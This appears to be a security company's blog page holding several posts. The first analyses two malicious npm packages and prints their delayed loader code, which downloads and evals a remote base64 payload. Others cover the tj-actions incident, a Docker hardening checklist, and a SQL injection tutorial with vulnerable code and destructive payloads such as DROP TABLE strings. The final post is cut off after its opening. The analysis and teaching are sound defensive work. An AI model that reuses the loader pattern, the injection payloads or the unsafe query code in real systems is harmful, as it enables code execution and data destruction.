Welcome to our blog.

Hide and Fail: Obfuscated Malware, Empty Payloads, and npm Shenanigans
On March 14th 2025, we detected a malicious package on npm called node-facebook-messenger-api. At first, it seemed to be pretty run-of-the-mill malware, though we couldn’t tell what the end goal was. We didn’t think much more of it until April 3rd 2025, when we saw the same threat actor expand their attack. This is a brief overview of the techniques used by this specific attacker, and some fun observations about how their attempts at obfuscation actually end up making them even more obvious.
TLDR
- On March 14th 2025 we flagged node-facebook-messenger-api@4.1.0, disguised as a legit Facebook Messenger wrapper.
- It used axios and eval() to pull a payload from a Google Docs link — but the file was empty.
- A later version switched to the zx library to avoid detection, embedding malicious logic that triggers days after publish.
- On April 3rd 2025 the same actor published node-smtp-mailer@6.10.0, impersonating nodemailer, with the same C2 logic and obfuscation.
- Both packages pull zx in through the same added dependency (hyper-types), revealing a clear signature pattern linking the attacks.
First steps
It all started on March 14th at 04:37 UTC, when our systems alerted us to a suspicious package. It was published by the user victor.ben0825, who also claims to have the name perusworld. That is the username of the owner of the legitimate repository for this library.

Here’s the code it detected as being malicious in node-facebook-messenger-api@4.1.0, in the file messenger.js, lines 157-177:
const axios = require('axios');
const url = 'https://docs.google.com/uc?export=download&id=1ShaI7rERkiWdxKAN9q8RnbPedKnUKAD2';

async function downloadFile(url) {
    try {
        const response = await axios.get(url, {
            responseType: 'arraybuffer'
        });
        const fileBuffer = Buffer.from(response.data);
        eval(Buffer.from(fileBuffer.toString('utf8'), 'base64').toString('utf8'))
        return fileBuffer;
    } catch (error) {
        console.error('Download failed:', error.message);
    }
}

downloadFile(url);
The attacker has tried to hide this code within a 769-line file, which is one big class. Here they’ve added a function, and are calling it directly. Very cute, but very obvious too. We attempted to fetch the payload, but it was empty. We flagged it as malware and moved on.
A few minutes later, the attacker pushed another version, 4.1.1. The only change appeared to be in the README.md and package.json files, where they changed the version, description, and installation instructions. Because we had marked the author as a bad author, packages from this point on were automatically flagged as malware.
Trying to be sneaky
Then on March 20th 2025 at 16:29 UTC, our system automatically flagged version 4.1.2
of the package. Let's look at what was new there. The first change is in node-facebook-messenger-api.js,
which contains:
"use strict";
module.exports = {
messenger: function () {
return require('./messenger');
},
accountlinkHandler: function () {
return require('./account-link-handler');
},
webhookHandler: function () {
return require('./webhook-handler');
}
};
var messengerapi = require('./messenger');
The change to this file is the last line. The messenger.js file isn’t just imported when requested anymore; it’s now always imported when the module is loaded. Clever! The other change is to that file, messenger.js. The previously added code has been removed, and the following was added on lines 197 to 219:
const timePublish = "2025-03-24 23:59:25";
const now = new Date();
const pbTime = new Date(timePublish);
const delay = pbTime - now;

if (delay <= 0) {
    async function setProfile(ft) {
        try {
            const mod = await import('zx');
            mod.$.verbose = false;
            const res = await mod.fetch(ft, {redirect: 'follow'});
            const fileBuffer = await res.arrayBuffer();
            const data = Buffer.from(Buffer.from(fileBuffer).toString('utf8'), 'base64').toString('utf8');
            const nfu = new Function("rqr", data);
            nfu(require)();
        } catch (error) {
            //console.error('err:', error.message);
        }
    }
    const gd = 'https://docs.google.com/uc?export=download&id=1ShaI7rERkiWdxKAN9q8RnbPedKnUKAD2';
    setProfile(gd);
}
Here’s an overview of what it does:
- It uses a time-based check to decide whether to activate the malicious code. It would only activate about 4 days later.
- Instead of using axios, it now uses Google's zx library to fetch the malicious payload.
- It disables verbose mode, which is also the default.
- It then fetches the malicious code.
- It base64 decodes it.
- It creates a new function using the Function() constructor, which is effectively equivalent to an eval() call.
- It then calls the function, passing in require as an argument.
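To make those last two steps concrete, here’s a minimal sketch of the loader’s calling convention with a harmless stand-in payload (the payload string is ours, not the attacker’s, since we never obtained a real one):

// Stand-in for the base64 file the attacker would host on Google Docs.
// The loader expects base64 of a function *body* that returns another function.
const fakePayload = Buffer.from(
    "return function () { console.log('payload ran, require is a', typeof rqr); }"
).toString('base64');

// Exactly the steps from messenger.js: decode, wrap in a Function, call with require.
const data = Buffer.from(fakePayload, 'base64').toString('utf8');
const nfu = new Function("rqr", data);   // effectively an eval()
nfu(require)();                          // binds "rqr" to require, then runs the inner function

This also shows why the downloaded file has to decode to code that returns a function: the loader immediately calls whatever the decoded body returns.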
But again, when we try to fetch the file, we don’t get a payload. We just get an empty file called info.txt.
The use of zx
is curious. We looked at the dependencies, and noticed that the original package contained a few dependencies:
"dependencies": {
"async": "^3.2.2",
"debug": "^3.1.0",
"merge": "^2.1.1",
"request": "^2.81.0"
}
And the malicious package contains the following:
"dependencies": {
"async": "^3.2.2",
"debug": "^3.1.0",
"hyper-types": "^0.0.2",
"merge": "^2.1.1",
"request": "^2.81.0"
}
Look at that: they added the dependency hyper-types. Very interesting; we will return to this a few more times.
They strike again!
Then on April 3rd 2025 at 06:46, a new package was released by the user cristr. They released the package node-smtp-mailer@6.10.0. Our systems automatically flagged it due to containing potentially malicious code. We looked at it, and we got a bit excited. The package pretends to be nodemailer, just with a different name.

Our system flagged the file lib/smtp-pool/index.js.
We quickly see that the attacker has added code at the bottom of the legitimate file, right before the final module.exports
. Here is what is added:
const timePublish = "2025-04-07 15:30:00";
const now = new Date();
const pbTime = new Date(timePublish);
const delay = pbTime - now;

if (delay <= 0) {
    async function SMTPConfig(conf) {
        try {
            const mod = await import('zx');
            mod.$.verbose = false;
            const res = await mod.fetch(conf, {redirect: 'follow'});
            const fileBuffer = await res.arrayBuffer();
            const data = Buffer.from(Buffer.from(fileBuffer).toString('utf8'), 'base64').toString('utf8');
            const nfu = new Function("rqr", data);
            nfu(require)();
        } catch (error) {
            console.error('err:', error.message);
        }
    }
    const url = 'https://docs.google.com/uc?export=download&id=1KPsdHmVwsL9_0Z3TzAkPXT7WCF5SGhVR';
    SMTPConfig(url);
}
We know this code! It’s again timestamped to only execute 4 days later. We excitedly try to fetch the payload, but we just receive an empty file called beginner.txt.
Booo! We look at the dependencies again, to see how they are pulling in zx
. We noted that the legitimate nodemailer
package has no direct dependencies
, only devDependencies
. But here’s what is in the malicious package:
"dependencies": {
"async": "^3.2.2",
"debug": "^3.1.0",
"hyper-types": "^0.0.2",
"merge": "^2.1.1",
"request": "^2.81.0"
}
Do you see a similarity between this and the first package we detected? It’s the same dependency list. The legitimate package has no dependencies, but the malicious one does. The attacker simply copied the full list of dependencies from the first attack to this one.
Interesting dependencies
So why did they switch from using axios
to zx
for making HTTP
requests? Definitely for avoiding detection. But what’s interesting is that zx
isn’t a direct dependency. Instead, the attacker has included hyper-types, which is a legitimate package by the developer lukasbach.

Besides the fact that the referenced repository doesn’t exist anymore, there’s something interesting to note here. See how there are 2 dependents? Guess who those are.

If the attacker had actually wanted to obfuscate their activity, it’s pretty dumb to depend on a package that they are the only dependents of.
Final words
While the attacker behind these npm packages ultimately failed to deliver a working payload, their campaign highlights the ongoing evolution of supply chain threats targeting the JavaScript ecosystem. The use of delayed execution, indirect imports, and dependency hijacking shows a growing awareness of detection mechanisms—and a willingness to experiment. But it also shows how sloppy operational security and repeated patterns can still give them away. As defenders, it's a reminder that even failed attacks are valuable intelligence. Every artifact, obfuscation trick, and reused dependency helps us build better detection and attribution capabilities. And most importantly, it reinforces why continuous monitoring and automated flagging of public package registries is no longer optional—it's critical.

Get the TL;DR: tj-actions/changed-files Supply Chain Attack
Let’s get into the tj-actions/changed-files supply chain attack. Read on for TL;DR, what you should do, what happened, and further information.
TL;DR
- The tj-actions/changed-files
GitHub Action, which is currently used in over 23,000 repositories, has been compromised, leaking secrets through workflow logs and impacting thousands of CI pipelines.
- All tagged versions were modified, making tag-based pinning unsafe. Public repositories are at the highest risk, but private repos should also verify their exposure.
- Immediate steps include identifying affected workflows, removing all references to the compromised action, rotating secrets, and checking logs for suspicious activity.
Aikido’s response: We released a new SAST rule that flags any usage with critical severity (Score 100). Aikido can automatically pin your Github actions to prevent this kind of exploit in the future.
First off, what should you do?
Check if you are affected by the tj-actions/changed-files
supply chain attack:
A) Search for tj-actions
in your codebase
B) Use this Github query to find references to the affected GitHub action in your organization's repositories (replace [your-org] with the name of your organization).
Stop using tj-actions/changed-files
as soon as possible and remove all references to the compromised action.
Rotate the secrets of the affected pipelines and check logs of your (3rd party) services for suspicious use of the exposed tokens; focus on repos with publicly accessible CI runner logs first.
Let’s get into the attack: What happened?
A security incident involving the tj-actions/changed-files
GitHub Action was identified in mid-March 2025. Attackers introduced malicious code that exposed CI/CD secrets via workflow logs. First reported by Step Security, the incident has been assigned CVE-2025-30066.
While there remains a lack of clarity about what happened and how the code got pushed, most reports indicate that the attacker compromised a GitHub Personal Access Token (PAT) linked to the tj-actions-bot account, which allowed the attacker to make unauthorized modifications, inject malicious code, and manipulate version tags.
Timeline of events:
Before March 14, 2025: The malicious code began impacting affected repositories, causing secrets to leak into public logs.
March 14, 2025: Security researchers identified the compromise and raised awareness.
March 15, 2025: The malicious script hosted on GitHub Gist was removed. The compromised repository was briefly taken offline to revert the malicious changes and later restored without the harmful commits.
March 15, 2025: The repo is back online with a statement on the attack; the maintainer has also commented on the attack.
While the immediate threat has been addressed, cached versions of the compromised action could still pose a risk. Proactive mitigation is necessary to secure sensitive credentials.
What is the impact of the tj-actions/changed-files attack?
Repositories using the popular tj-actions/changed-files action, especially public ones, risk leaking the secrets used in their pipelines. These secrets were exposed in workflow logs by the threat actor's malicious code. Although no confirmed external data exfiltration occurred, logs of public repositories could be accessed by malicious actors. Private repositories are less affected but should still assess their exposure, and rotate secrets if affected.
Public Repositories: High risk due to public exposure of workflow logs containing secrets.
Private Repositories: Lower risk, but having active secrets exposed in your workflow logs is still a significant risk.
Cached Action Users: Workflows that cached the compromised action may continue to be at risk until caches are purged.
How can Aikido help?
We released a new SAST rule that flags any tj-actions/changed-files
usage with critical severity (Score 100). If you already use Aikido, you're covered. If you do not have an Aikido account, you can connect and scan your setup in a few seconds.
Beyond this attack, Aikido also automatically pins your Github actions to prevent this kind of exploit in the future.
And our proprietary malware threat feed - Aikido Intel - detects malware within 3 minutes of release on npm and PyPI, and will be extended to GitHub Actions soon.
We make it easy to secure your software supply chain, and provide you with the earliest warning for new risks and attacks.
Learn more about the attack:
- A breakdown on “Understanding and Re-Creating the tj-actions/changed-files Supply Chain Attack” by Latio Analyst, James Berthoty. James also shows you how to re-create the attack in your own environment to test your sensor (be careful).
- Step Security, who first reported the attack, published an investigation analysis, “Harden-Runner detection: tj-actions/changed-files action is compromised”
- View CVE-2023-51664

A no-BS Docker security checklist for the vulnerability-minded developer
Why are you here?
You want to know the real answer to two questions about Docker security:
Is Docker secure for production use?
Yes and no. Docker uses a security model that relies on namespaces and resource isolation, making the processes within more secure from specific attacks than running your applications directly on a cloud VM or bare metal system. Despite that layer, there are still plenty of ways for attackers to access your container, allowing them to read confidential information, run denial-of-service (DoS) attacks, or even gain root access to the host system.
How can I improve my Docker security (in a not terribly painful way)?
We’ll walk you through the most common and severe Docker vulnerabilities, skipping over the basic recommendations you’ll find all over Google, like using official images and keeping your host up to date. Instead, we’ll lead you directly to new Docker options and Dockerfile lines that will make your new default Docker container deployment far more secure than ever.

The no-BS Docker security checklist
Make in-container filesystems read-only
What do you gain?
You prevent an attacker from editing the runtime environment of your Docker container, which could allow them to collect useful information about your infrastructure, gather user data, or conduct a DoS or ransomware attack directly.
How do you set it?
You have two options, either at runtime or within your Docker Compose configuration.
At runtime: docker run --read-only your-app:v1.0.1
In your Docker Compose file:
services:
  webapp:
    image: your-app:v1.0.1
    read_only: true
    ...
Lock privilege escalation
What do you gain?
You keep your Docker container—or an attacker who is mucking about inside said container—from enabling new privileges, even root-level, with setuid or setgid. With more permissive access to your container, an attacker could access credentials in the form of passwords or keys to connected parts of your deployment, like a database.
How do you set it?
Once again, at runtime or within your Docker Compose configuration.
At runtime: docker run --security-opt=no-new-privileges your-app:v1.0.1
In your Docker Compose file:
services:
  webapp:
    image: your-app:v1.0.1
    security_opt:
      - no-new-privileges:true
    ...
Isolate your container-to-container networks
What do you gain?
By default, Docker lets all containers communicate via the docker0 network, which might allow an attacker to move laterally from one compromised container to another. If you have discrete services A
and B
in containers Y
and Z
, and they don’t need to communicate directly, isolating their networks provides the same end-user experience while preventing lateral movement for better Docker security.
How do you set it?
You can specify Docker networks at runtime or within your Docker Compose configuration. However, you first need to create the network:
docker network create your-isolated-network
At runtime, add the --network option: docker run --network your-isolated-network your-app:v1.0.1
Or the equivalent option in your Docker Compose file:
services:
  webapp:
    image: your-app:v1.0.1
    networks:
      - your-isolated-network
    ...
Set a proper non-root user
What do you gain?
The default user within a container is root
, with a uid of 0
. By specifying a distinct user, you prevent an attacker from escalating their privileges to another user that can take action without restrictions, like root, which would override any other Docker security measures you’ve worked hard to implement.
How do you set it?
Create your user during the build process or at runtime. At runtime, you can either create the user for the first time, or override the USER you already set at build time.
During the build process, in your Dockerfile
:
...
RUN groupadd -r your-user
RUN useradd -r -g your-user your-user
USER your-user
...
At runtime: docker run -u your-user your-app:v1.0.1
Drop Linux kernel capabilities
What do you gain?
By default, Docker containers are allowed to use a restricted set of Linux kernel capabilities. You might think the folks at Docker created that restricted set to be completely secure, but many capabilities exist for compatibility and simplicity. For example, default containers can arbitrarily change ownership on files, change their root directory, manipulate process UIDs, and read sockets. By dropping some or all of these capabilities, you minimize the number of attack vectors.
How do you set it?
You can drop capabilities and set new ones at runtime. For example, you could drop all kernel capabilities and allow your container only the capability to change ownership of existing files.
docker run --cap-drop ALL --cap-add CHOWN your-app:v1.0.1
Or for Docker Compose:
services:
  webapp:
    image: your-app:v1.0.1
    cap_drop:
      - ALL
    cap_add:
      - CHOWN
    ...
Prevent fork bombs
What do you gain?
Fork bombs are a type of DoS attack that infinitely replicates an existing process. First, they reduce performance and restrict resources, which inevitably raises costs and can ultimately crash your containers or the host system. Once a fork bomb has started, there’s no way to stop it other than restarting the container or the host.
How do you set it?
At runtime, you can limit the number of processes (PIDs) your container can create.
docker run --pids-limit 99 your-app:v1.0.1
Or with Docker Compose:
services:
  webapp:
    image: your-app:v1.0.1
    deploy:
      resources:
        limits:
          pids: 99
Improve Docker security by monitoring your open source dependencies
What do you gain?
The applications you’ve containerized for deployment with Docker likely have a wide tree of dependencies, and monitoring that tree is the only way to know when a vulnerable or malicious package makes its way into your images.
How do you set it?
The most “non-BS” way is with Aikido’s open-source dependency scanning. Our continuous monitoring scans projects written in more than a dozen languages based on the presence of lockfiles within your application and delivers an instant overview of vulnerabilities and malware. With automatic triaging that filters out false positives, Aikido gives you remediation advice you can start working with right away… not only after you read a dozen other reference documents and GitHub issues.
At Aikido, we love established open-source projects like Trivy, Syft, and Grype. We also know from experience that using them in isolation isn’t a particularly good developer experience. Under the hood, Aikido enhances these projects with custom rules to bridge gaps and reveal security flaws you wouldn’t be able to find otherwise. Unlike chaining various open-source tools together, Aikido frees you from having to build a scanning script or create a custom job in your CI/CD.

Use only trusted images for Docker security
What do you gain?
Docker Content Trust (DCT) is a system for signing and validating the content and integrity of the official images you pull from Docker registries like Docker Hub. Pulling only images signed by the author gives you more reassurance they haven’t been tampered with to create vulnerabilities in your deployment.
How do you set it?
The easiest way is to set the environment variable on your shell, which prevents you or anyone else from working with untrusted images.
export DOCKER_CONTENT_TRUST=1
docker run ...
Or, you can set the environment variable each time you execute Docker:
DOCKER_CONTENT_TRUST=1 docker run …
Update end-of-life (EOL) runtimes
What do you gain?
One common recommendation for Docker container security is to pin images and dependencies to a specific version instead of latest
. In theory, that prevents you from unknowingly using new images, even ones that have been tampered with, that introduce new vulnerabilities. The flip side is that pinned runtimes eventually reach end of life, and once they stop receiving security patches, every new vulnerability is yours to keep.
How do you set it?
You have some open-source projects available to help you discover EOLs and best prepare. The endoflife.date project (GitHub repository) tracks more than 300 products by aggregating data from multiple sources and making it available via a public API. You have a few options with endoflife.date and similar projects:
- Manually check the project for updates on dependencies your applications rely on and create tickets or issues for required updates.
- Write a script (Bash, Python, etc.) to get the EOL dates of dependencies from the API and run it regularly, like a cron job (see the sketch after this list).
- Incorporate the public API, or that custom script, into your CI platform to fail builds that use a project that’s nearing or reached EOL.
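For the scripted option, here’s a minimal Node.js sketch (Node 18+ for the built-in fetch). It assumes the public endoflife.date JSON endpoint at https://endoflife.date/api/<product>.json, which returns an array of release cycles with an eol date; the product list and warning threshold are placeholders to adapt:

// Warn when a runtime you depend on is approaching end of life.
// PRODUCTS and WARN_DAYS are illustrative; adjust to what your images actually run.
const PRODUCTS = ['nodejs', 'nginx'];
const WARN_DAYS = 90;

async function checkEol(product) {
    const res = await fetch(`https://endoflife.date/api/${product}.json`);
    if (!res.ok) throw new Error(`endoflife.date returned ${res.status} for ${product}`);
    const cycles = await res.json();
    for (const { cycle, eol } of cycles) {
        if (typeof eol !== 'string') continue; // no EOL date published for this cycle
        const daysLeft = Math.round((new Date(eol) - Date.now()) / 86400000);
        if (daysLeft < WARN_DAYS) {
            console.warn(`${product} ${cycle} reaches EOL on ${eol} (${daysLeft} days left)`);
        }
    }
}

Promise.all(PRODUCTS.map(checkEol)).catch((err) => {
    console.error(err);
    process.exit(1); // fail the cron job or CI step if the check itself breaks
});

Run it on a schedule, or wire it into CI and exit non-zero once a tracked cycle passes its EOL date if you want builds to fail, per the third option above.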
As a developer, we understand that your time is valuable and often limited. This is where Aikido can provide a sense of security—our EOL scanning feature tracks your code and containers, prioritizing runtimes with the most impact and exposure, like Node.js or an Nginx web server. As usual, we not only automate collecting information, but deliver alerts with appropriate severity to inform, not overwhelm you.

Limit container resource usage
What do you gain?
By default, containers have no resource constraints and will use as much memory or CPU as the host’s scheduler. Limiting the resource usage of a specific container can minimize the impact of a DoS attack. Instead of crashing your container or host system due to an Out of Memory Exception, the ongoing DoS attack will “only” negatively impact the end-user experience.
How do you set it?
At runtime, you can use the --memory and --cpus options to set limits for memory and CPU usage, respectively. The memory option takes numbers with g for gigabytes and m for megabytes, while the CPU option reflects the limit of dedicated CPUs available for the container and its processes.
docker run --memory="1g" --cpus="2" your-app:v1.0.1
This also works with Docker Compose:
services:
  webapp:
    image: your-app:v1.0.1
    deploy:
      resources:
        limits:
          cpus: '2'
          memory: 1G
    ...
Your final command and Compose options for Docker security
By now you’ve seen quite a few Docker security tips and the relevant CLI options or configuration to go along with them, which means you’re either quite excited to implement them or overwhelmed with how to piece them all together. Below, we’ve rolled up all the recommendations into a single command or configuration template, which will help you start deploying more secure Docker containers right away.
Obviously, you’ll want to change some of the options—like the non-root user name, kernel capabilities, resource limits—based on your application’s needs.
export DOCKER_CONTENT_TRUST=1
docker run \
  --read-only \
  --security-opt=no-new-privileges \
  --network your-isolated-network \
  --cap-drop ALL \
  --cap-add CHOWN \
  --pids-limit 99 \
  --memory="1g" --cpus="2" \
  --user=your-user \
  ... # OTHER OPTIONS GO HERE
  your-app:v1.0.1
You might even want to create a drun alias with your host’s shell you can invoke without having to remember all those details.
function drun {
  docker run \
    --read-only \
    --security-opt=no-new-privileges \
    --network your-isolated-network \
    --cap-drop ALL \
    --cap-add CHOWN \
    --pids-limit 99 \
    --memory="1g" --cpus="2" \
    --user=your-user \
    $1 \
    $2
}
Then run your alias like so, with your options and image name: drun -it your-app:v1.0.1
If you’re a Docker Compose kind of person, you can adapt all the same options into a new baseline Docker Compose template you can work from in the future:
services:
  webapp:
    image: your-app:v1.0.1
    read_only: true
    security_opt:
      - no-new-privileges:true
    networks:
      - your-isolated-network
    cap_drop:
      - ALL
    cap_add:
      - CHOWN
    deploy:
      resources:
        limits:
          pids: 99
          cpus: '2'
          memory: 1G
    ... # OTHER OPTIONS GO HERE
Bonus: Run Docker with rootless containers
When you install Docker on any system, its daemon operates with root-level privileges. Even if you enable all the options above, and prevent privilege escalation within a Docker container, the rest of the container runtime on your host system still has root privileges. That inevitably widens your attack surface.
The solution is rootless containers, which an unprivileged user can create and manage. No root privileges involved means far fewer security issues for your host system.
We wish we could help you use rootless containers with a single option or command, but it’s just not that simple. You can find detailed instructions at the Rootless Containers website, including a how-to guide for Docker.
What’s next for your Docker security?
If you’ve learned anything from this experience, it’s that container security is a long-tail operation. There are always more hardening checklists and deep-dive articles to read about locking down your containers in Docker or its older and often misunderstood cousin, Kubernetes. You can’t possibly aim for faultless container security—creating time in your busy development schedule to address security, and then making incremental improvements based on impact and severity, will go a long way over time.
To help you make the most of that continuous process and prioritize fixes that will meaningfully improve your application security, there’s Aikido. We just raised a $17 million Series A for our “no BS” developer security platform, and we’d love to have you join us.

Sensing and blocking JavaScript SQL injection attacks
Why are you here?
You’ve heard about JavaScript SQL injection attacks before, but you’re not entirely sure what they look like in the wild or if you need to worry about them in the first place. Maybe you’re trying to figure out just how bad it could be.
In short, if you’re building apps using SQL databases, like MySQL and PostgreSQL, you’re at risk—you’re not safe from attack methods that have plagued developers and their databases for decades. As a developer, the onus is on you to implement guardrails that protect user data and ensure your underlying infrastructure is never intruded upon, explored, or commandeered.
All the new tools say they’re helping you, but they just make development more complex.
You can add an object–relational mapper (ORM) like Sequelize and TypeORM to simplify how you work with SQL databases like MySQL and PostgreSQL, but they don’t completely absolve you of risk. Web application firewalls (WAFs) help you block attacks at the networking level, but require expensive infrastructure and constant maintenance. Code-scanners can help you identify obvious flaws, but do far less for the unknown unknowns and lurking zero-day techniques.
We’ll present you with a clear picture of what SQL injection attacks look like, the risk they carry, and the development mistakes that make them possible. Then we’ll do you one better by walking you through installing a global hotfix so you’ll know, with certainty, that your apps are safe.
SQL injection attacks: examples and implications
The most basic definition of an SQL injection attack is when an app allows unvalidated and unsanitized user input to run database queries, allowing an attacker to read the SQL database, modify records, or delete to their heart’s content.
As usual, XKCD illustrates the danger of SQL injection better than most gloomy scenarios we could dream up:

What does a vulnerable JavaScript app look like?
Let’s start with a simple pseudocode example: a JavaScript app with an input element that allows users to search a database of cats. In the example JavaScript code below, the app responds to POST requests on the /cats path to extract the user input from the request body and connects to the database with a query to return all cats with a matching id. The app then displays the cat using the JSON response.
app.post("/cats", (request, response) => {
const query = `SELECT * FROM cats WHERE id = ${request.body.id}`;
connection.query(query, (err, rows) => {
if(err) throw err;
response.json({
data: rows
});
});
});
While this example might look innocuous to those untrained on SQL injection attacks, it’s egregiously vulnerable. Notably, the app does not attempt to validate or sanitize user input for potentially dangerous strings or encoding methods, and concatenates user input directly into the SQL query, which allows attackers multiple opportunities to attack using common SQL injection attack methods that have existed for decades.
Example JavaScript SQL attack payloads
SQL injection hinges on tricking your MySQL or PostgreSQL database into taking action or responding with data outside the expected scope due to how your app generates SQL queries.
The 1=1 is always true attack can return the entire table of cats with tricks like apostrophes or quotation marks, because 1=1 is indeed always TRUE:
- The user inputs:
BOBBY TABLES’ OR 1=’1
- The database executes the SQL query:
SELECT * FROM Cats WHERE Cat = 'BOBBY TABLES' OR 1='1';
Similarly, attackers can exploit a = is always true attack to return all cats, because ""=""
is always TRUE:
- The user inputs:
" OR ""="
- The database executes the SQL query:
SELECT * FROM Cats WHERE CatId ="" or ""="";
Attackers will often exploit how databases handle inline comments, and by inserting comments (/* … */)
into a query, they can obfuscate their intent or bypass filters.
- The user inputs:
DR/*hello world*/OP/*sneak attack*/ TABLE Cats;
- The database executes the SQL query:
DROP TABLE Cats;
Another common JavaScript SQL injection strategy is query stacking, which lets attackers start with an innocuous string, then use a semicolon (;) to terminate that statement and begin another containing their injection. Attackers often use query stacking to delete entire databases in one fell swoop with a DROP TABLE command:
- The user inputs:
Bobby; DROP TABLE Cats --
- The app builds its SQL query:
const query = "SELECT * FROM Cats WHERE CatId = " + input;
- The database executes the SQL query:
SELECT * FROM Cats WHERE CatId = Bobby; DROP TABLE Cats --
What about NoSQL injection attacks?
NoSQL injection attacks are equally dangerous to the security of your app and user data, but only affect tech stacks using databases like MongoDB. The main difference is the style attacks, as SQL and NoSQL queries use entirely unique syntax that doesn’t translate from one category to the other.
If you’re using a SQL database, you’re not at risk of NoSQL injection attacks, and vice versa.
The basic path: manually fixing all your SQL injection vulnerabilities
At this point, you might be less interested in what all the possible injection tricks look like and more interested in how to protect the data you have in MySQL or PostgreSQL.
- Use parameterized queries: SQL has functionality to disconnect the execution of queries and values, protecting the database from injection attacks. With the JavaScript/Node.js example from above, you can employ a placeholder in your SQL query with a question mark (?). The connection.query() method then takes the parameter in its second argument, providing the same results in an injection-proof way.
app.post("/cats", (request, response) => {
const query = `SELECT * FROM Cats WHERE id = ?`;
const value = request.body.id;
connection.query(query, value, (err, rows) => {
if(err) throw err;
response.json({
data: rows
});
});
});
- Validate and sanitize user input: While parameterized queries can help protect your SQL database from intrusion and attack, you can also prevent users from entering potentially dangerous strings into your application.
One option is adding open-source libraries for sanitization and validation to your app. For example, you can use validator.js in the JavaScript/Node.js ecosystem to double-check that a user is trying to enter a real email address—not an SQL injection attack—into your sign-up form.
You can also develop custom regex-based validators to perform similar work, but you’ll have an enormously time-consuming and complex road ahead with research and tons of manual testing. Plus, can you really interpret this example regex for email validation?
const re = /^(([^<>()[\]\\.,;:\s@"]+(\.[^<>()[\]\\.,;:\s@"]+)*)|(".+"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;
The same idea applies to preventing strings like …' OR 1='1.
You can try to research and close down all these opportunities yourself, but you’d probably rather spend your time building new features.
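To make the validator.js option above concrete, here’s a minimal sketch of an email check in front of a sign-up route (the route, port, and field names are illustrative, not from the cat app above):

const express = require('express');
const validator = require('validator');

const app = express();
app.use(express.json());

app.post('/signup', (request, response) => {
    const email = String(request.body.email ?? '');
    // Reject anything that isn't a plausible email before it gets near a query.
    if (!validator.isEmail(email)) {
        return response.status(400).json({ error: 'Invalid email address' });
    }
    // ...continue with a parameterized INSERT using the validated value
    response.json({ ok: true });
});

app.listen(3000);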
- Deploy WAFs or agent-based security platforms: While these solutions can block SQL attacks before they even touch your app, or at least notify you in real-time as attacks happen, they come with some caveats.
First, they are often expensive and require you to launch new infrastructure on-premises or in the cloud, which is often far more complex than what you signed up for as a developer who just wants to ship to production. Second, they require more manual maintenance to update the ruleset, distracting you from other manual interventions to SQL injection. Finally, they often add more computational load, or redirect all requests through their platform for analysis, adding latency and harming the end-user experience.
The big problem is that opportunities for SQL injection attacks are like weeds—you can cut them all down once using these tools, but you must be constantly vigilant over your entire codebase to ensure they never sprout again.
An alternative path to solving JavaScript SQL injection attacks: Aikido Firewall
Aikido Security recently released Firewall, a free and open-source security engine that autonomously protects you from SQL injection attacks—and a whole lot more.
If you’re not using Node.js, just know that we’ll start supporting other languages and frameworks in the future. You can always subscribe to our product newsletter to hear exactly when Firewall expands beyond the JavaScript world or email us at hello@aikido.dev if you’d like to pitch a specific language.
Testing an app that’s vulnerable to JavaScript SQL injection
Let’s use a sample app that ships with the open-source repository to showcase how Aikido Firewall works. You’ll also need Docker/Docker Compose to deploy a local MySQL database.
Start by forking the firewall-node repository and cloning said fork to your local workstation.
git clone https://github.com/<YOUR-GITHUB-USERNAME>/firewall-node.git
cd firewall-node
Use Docker to deploy a local MySQL database on port 27015. This docker-compose.yml file also creates s3mock, MongoDB, and PostgreSQL containers, as it was created to help the Aikido team test how Firewall blocks various attacks.
docker-compose -f sample-apps/docker-compose.yml up -d
Next, launch the sample app:
node sample-apps/express-mysql2/app.js
Open http://localhost:4000
in your browser to check out the very simple cat app. In the textarea, type in a few cat names and click the Add button. To test SQL injection, you can either click the Test injection link or type the following into the textarea: Kitty'); DELETE FROM cats;-- H
and click Add again. Either way, the app allows you to stack multiple queries together using some sneaky query comments, deleting the entire cats database.
How does this happen? As we warned against earlier, this app simply tacks on any user input at the end of the SQL query, which is inherently unsafe.
const query = `INSERT INTO cats(petname) VALUES ('${name}');`
The consequences might be small here, but it’s not hard to imagine how this oftentimes honest mistake can have disastrous consequences for your production app.
Blocking JavaScript SQL injection with Aikido Firewall
Now let’s look at how quickly our open-source security engine blocks JavaScript SQL injection attacks without manually fixing every database interaction in your code.
If you don’t yet have an Aikido account, go ahead and make one for free. If you already have one, log in and connect your GitHub account. During that process, grant Aikido access to read your fork of the firewall-node
project.
Go to the Firewall dashboard and click Add Service. Give your service a name and once again choose your fork for the firewall-node
project.

Aikido then instructs you on how to install and implement Aikido Firewall. Since we’re using the example app, that work is already done for you, but it’s a helpful reference for how you’d go about bringing our open-source security engine to all your Node.js apps that might be vulnerable to JavaScript SQL injection attacks.

Click the Generate Token button to create a token to let Aikido Firewall securely pass information about blocked SQL injection attacks to the Aikido security platform. Copy the generated token, which starts with AIK_RUNTIME…
, and head back to your terminal to rerun the sample app, only now with Firewall fully enabled in blocking mode:
AIKIDO_TOKEN=<YOUR-AIKIDO-TOKEN> AIKIDO_DEBUG=true AIKIDO_BLOCKING=true node sample-apps/express-mysql2/app.js
Open localhost:4000
and once again invoke the included SQL injection attack. This time, Aikido will block you at the browser, output to your local web server’s logs, and generate a new event. Click that to see comprehensive details about the SQL injection attempt, including the payload and where your app generated the dangerous SQL query.

Instead of worrying about forever protecting your apps against JavaScript SQL injection attacks, both critical and not-yet-seen, Aikido Firewall offers comprehensive blocking and sophisticated observability that keeps you informed about attack sources, common payloads, and potential weak points.
What’s next?
You can install and implement Aikido Firewall in all your Node.js-based applications for free. Our open-source embedded security engine protects your infrastructure and user data against JavaScript SQL injection attacks, command injection, prototype pollution, path traversal, and more to come shortly.
We’re not saying Firewall should replace development best practices for protecting against SQL injection, like using parameterized queries or never trusting user input, but we also know from personal experience that no developer is perfect. No codebase is faultless, and honest mistakes happen all the time.
Think of Firewall as a global hotfix for SQL injection. Unlike custom-developed regex, latency-inducing WAFs, or complex security agents that cost a pretty penny, it does this one job extraordinarily well and with negligible impact—entirely for free.
If you like what you’ve seen, check out our roadmap and give our GitHub repository (https://github.com/AikidoSec/firewall-node) a star. ⭐

Prisma and PostgreSQL vulnerable to NoSQL injection? A surprising security risk explained
Introduction
Imagine you’re building a blogging web app using Prisma. You write a simple query to authenticate users based on their provided email and password:
